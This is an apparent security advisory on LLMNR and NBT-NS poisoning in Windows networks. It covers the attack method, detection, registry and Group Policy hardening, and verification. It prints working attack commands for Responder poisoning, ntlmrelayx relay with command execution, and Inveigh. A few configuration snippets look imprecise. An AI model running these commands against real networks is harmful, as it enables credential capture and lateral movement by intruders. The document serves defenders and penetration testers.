LLMNR and NBT-NS Poisoning

Description

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are legacy name resolution protocols used in Windows environments as fallback mechanisms when DNS fails to resolve a hostname. These protocols create significant security vulnerabilities that attackers can exploit to intercept network traffic, harvest credentials, and perform lateral movement attacks.

When a Windows system cannot resolve a hostname via DNS, it automatically falls back to broadcasting LLMNR and NBT-NS queries to the local network segment, asking if any machine knows the requested hostname. This fallback behavior creates an opportunity for attackers to:

• Poison name resolution responses by spoofing legitimate services
• Capture NTLMv1/NTLMv2 authentication hashes for offline cracking
• Perform NTLM relay attacks to authenticate to other systems
• Conduct Man-in-the-Middle (MitM) attacks to intercept sensitive communications
• Establish persistent network access through compromised credentials

The vulnerability is particularly dangerous because these protocols operate by design without authentication or validation, making them inherently susceptible to spoofing attacks.

Impact

• Credential Harvesting: Capture NTLMv1/NTLMv2 hashes for offline password cracking attacks
• NTLM Relay Attacks: Use captured authentication to authenticate to other systems without cracking passwords
• Lateral Movement: Leverage compromised credentials to access additional systems and resources
• Privilege Escalation: Escalate privileges by capturing credentials from higher-privileged users
• Persistent Access: Establish long-term network access through harvested domain credentials
• Service Impersonation: Impersonate legitimate network services (SMB, HTTP, LDAP, etc.)
• Data Interception: Intercept and modify network communications through MitM attacks
• Domain Reconnaissance: Gather information about network topology, services, and user accounts

The impact is amplified in Active Directory environments where captured domain credentials can provide access to multiple systems and sensitive resources.

Technical Details

LLMNR (Link-Local Multicast Name Resolution)

• Protocol: Operates over UDP port 5355
• Scope: Multicast queries sent to 224.0.0.252 (IPv4) and FF02::1:3 (IPv6)
• Fallback Order: Activated when DNS resolution fails
• Authentication: No built-in authentication mechanism

NBT-NS (NetBIOS Name Service)

• Protocol: Operates over UDP port 137
• Scope: Broadcast queries sent to the local network segment
• Legacy Support: Maintains compatibility with older Windows systems
• Authentication: No authentication required for responses

Attack Methodology

1. Monitoring: Attacker monitors network for LLMNR/NBT-NS queries
2. Response Spoofing: Attacker responds to queries claiming to be the requested service
3. Authentication Capture: Victim attempts to authenticate to attacker-controlled service
4. Credential Extraction: Attacker captures NTLM authentication challenge/response
5. Exploitation: Credentials are either cracked offline or relayed to other systems

Common Attack Scenarios

Credential Harvesting with Responder

# Basic LLMNR/NBT-NS poisoning with Responder
responder -I eth0 -A
 
# Targeted poisoning with specific protocols
responder -I eth0 -A -f -w -r -d -P

NTLM Relay Attacks

# Relay captured authentication to SMB shares
ntlmrelayx.py -tf targets.txt -smb2support
 
# Relay to specific services
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Inveigh (PowerShell-based)

# PowerShell LLMNR/NBT-NS poisoning
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Proxy Y

Detection

Network Monitoring

• Traffic Analysis:

  • Monitor for unusual LLMNR queries (UDP 5355)
  • Track NBT-NS broadcast traffic (UDP 137)
  • Identify multiple responses to name resolution queries
  • Detect non-standard response patterns

• DNS Monitoring:

  • Log failed DNS resolution attempts
  • Monitor for suspicious hostname patterns
  • Track resolution fallback behavior

Event Log Analysis

• Windows Event Logs:

  # Monitor for NTLM authentication events
  Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624,4625}
   
  # Check for unusual authentication patterns
  Get-WinEvent -FilterHashtable @{LogName='System'; ID=8021,8022}

• Key Event IDs:

  • Event ID 4624: Successful logon (monitor for unusual sources)
  • Event ID 4625: Failed logon attempts
  • Event ID 4648: Logon using explicit credentials

Security Tools Integration

• SIEM Detection Rules:

  # Example SIEM rule for LLMNR poisoning
  rule: LLMNR_Poisoning_Detection
  condition:
    - protocol: UDP
    - destination_port: 5355
    - response_count > 2
    - source_diversity: true
  action: alert_high_priority

• Network IDS/IPS: Configure signatures for LLMNR/NBT-NS anomalies

• EDR Solutions: Monitor for Responder-like tools and suspicious network behavior

Remediation

Disable Legacy Protocols

• Group Policy Configuration:

  Computer Configuration → Administrative Templates → Network → DNS Client
  - "Turn off multicast name resolution": Enabled
  
  Computer Configuration → Administrative Templates → Network → Network Connections
  - "Prohibit use of Internet Connection Sharing": Enabled

• Registry Modifications:

  # Disable LLMNR
  [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient]
  "EnableMulticast"=dword:00000000
   
  # Disable NBT-NS
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
  "NodeType"=dword:00000002

• PowerShell Commands:

  # Disable LLMNR via PowerShell
  New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name "EnableMulticast" -Value 0 -PropertyType DWord
   
  # Disable NetBIOS over TCP/IP
  $adapters = Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object {$_.IPEnabled -eq $true}
  foreach ($adapter in $adapters) {
      $adapter.SetTcpipNetbios(2)  # 2 = Disable NetBIOS over TCP/IP
  }

Network Segmentation

• VLAN Isolation: Implement network segmentation to limit broadcast domains
• Micro-segmentation: Use software-defined networking for granular traffic control
• Network Access Control (NAC): Implement 802.1X authentication for network access

SMB Security Hardening

• Enable SMB Signing:

  # Require SMB signing for clients
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters]
  "RequireSecuritySignature"=dword:00000001
   
  # Require SMB signing for servers
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
  "RequireSecuritySignature"=dword:00000001

• Group Policy Settings:

  Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options
  - "Microsoft network client: Digitally sign communications (always)": Enabled
  - "Microsoft network server: Digitally sign communications (always)": Enabled

Authentication Security

• Implement Multi-Factor Authentication (MFA):

  • Deploy MFA for all privileged accounts
  • Use Azure AD Conditional Access policies
  • Implement FIDO2/Windows Hello for Business

• Password Security:

  • Enforce strong password policies
  • Implement password rotation for service accounts
  • Use Group Managed Service Accounts (gMSA)

Prevention

DNS Infrastructure Hardening

• Reliable DNS Services:

  • Implement redundant DNS servers
  • Use DNS forwarders and conditional forwarding
  • Monitor DNS resolution success rates

• DNS Security Extensions:

  • Deploy DNSSEC where possible
  • Implement DNS filtering and monitoring
  • Use secure DNS over HTTPS (DoH) or DNS over TLS (DoT)

Network Architecture

• Zero Trust Networking:

  • Implement explicit verification for all network communications
  • Use least-privilege access principles
  • Deploy continuous monitoring and verification

• Network Monitoring:

  # PowerShell script for network monitoring
  Get-NetTCPConnection | Where-Object {$_.LocalPort -eq 445 -or $_.LocalPort -eq 139}
  Get-NetUDPEndpoint | Where-Object {$_.LocalPort -eq 137 -or $_.LocalPort -eq 5355}

Security Awareness Training

• User Education:

  • Train users on social engineering tactics
  • Educate about suspicious network behavior
  • Implement security awareness programs

• Administrative Training:

  • Train IT staff on legacy protocol risks
  • Provide guidance on secure network configuration
  • Implement incident response procedures

Verification

Testing Network Configuration

• Verify Protocol Disablement:

  # Check LLMNR status
  Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name "EnableMulticast"
   
  # Check NetBIOS configuration
  Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object {$_.IPEnabled -eq $true} | Select-Object Description, TcpipNetbiosOptions

• Network Testing:

  # Test for LLMNR responses
  nslookup nonexistent.local
   
  # Check for NBT-NS responses
  nmblookup -A <target_ip>

Security Assessment

• Penetration Testing: Include LLMNR/NBT-NS poisoning in security assessments
• Red Team Exercises: Simulate attacks using Responder and similar tools
• Blue Team Validation: Test detection capabilities and response procedures

Advanced Mitigations

Application Control

• Windows Defender Application Control (WDAC):

  <!-- WDAC policy to block known poisoning tools -->
  <Rule>
    <Option>Enabled:Unsigned System Integrity Policy</Option>
    <Option>Enabled:Advanced Boot Options Menu</Option>
  </Rule>

• AppLocker Policies:

  • Block execution of known attack tools
  • Implement executable whitelisting
  • Monitor for policy violations

Network-Level Protection

• 802.1X Authentication:

  • Implement port-based network access control
  • Use certificate-based authentication where possible
  • Deploy Network Access Protection (NAP)

• DHCP Security:

  • Implement DHCP snooping
  • Use DHCP reservations for critical systems
  • Monitor for rogue DHCP servers

References

• MITRE ATT&CK: LLMNR/NBT-NS Poisoning and SMB Relay (T1557.001)
• CWE-522: Insufficiently Protected Credentials
• Microsoft: Disable LLMNR
• NIST SP 800-63B: Authentication Guidelines

Next Steps

If LLMNR and NBT-NS poisoning vulnerabilities are found during testing:

• Immediately disable legacy protocols on all Windows systems
• Implement SMB signing to prevent NTLM relay attacks
• Review captured credentials and force password resets for compromised accounts
• Consider related Windows security issues:
  • Bring Your Own Vulnerable Driver (BYOVD)
  • PrintNightmare
  • Active Directory security hardening

Takeaway: LLMNR and NBT-NS poisoning attacks represent fundamental security weaknesses in default Windows configurations. Organizations must disable these legacy protocols, implement network segmentation, and deploy comprehensive monitoring to protect against credential harvesting and lateral movement attacks. Make legacy protocol remediation a priority security initiative.